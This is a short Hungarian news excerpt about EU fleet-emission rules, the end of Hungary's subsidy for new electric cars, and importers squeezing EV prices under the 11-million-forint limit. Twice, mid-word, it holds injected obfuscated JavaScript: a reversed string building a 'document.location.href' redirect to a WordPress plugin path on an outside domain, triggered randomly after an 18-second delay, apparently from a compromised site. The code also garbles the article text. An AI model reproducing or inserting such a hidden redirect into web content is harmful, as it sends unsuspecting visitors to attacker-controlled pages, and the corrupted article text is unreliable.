Tekintve, hogy az európai flottafogyasztás-csökkentési előírások az elektromos autók szén-dioxid-kibocsátását nullának hazudják, az eladott autóik CO2-átlagát csökkenteni kívánó autógyártók impozánsan bővítik kínálatukat a konnektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torról tölthető akkus hibridek mellett tisztán elektromos autókkal is. Csakhogy idén február végén megszűnt az állami támogatás új elektromos autó vásárlására Magyarországon. Aki tudott, kivárt az autó beszerzésével, illetve forgalomba helyezésével és remélte, hogy csak ideiglenesen apadt el az adófizetői hozzájárulás. Mivel a 2,5 milliós hozzájárulás 11 milliós árhatárig érvényes, jelenleg minden importőrnek az a feladata, hogy minél több elektromos autója árát beszuszakolja a limit alá, ha lehetséges. Például a Honda e 11,1 millió forintjából elegendő 100 ezer forintoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot…
- Hirdetés -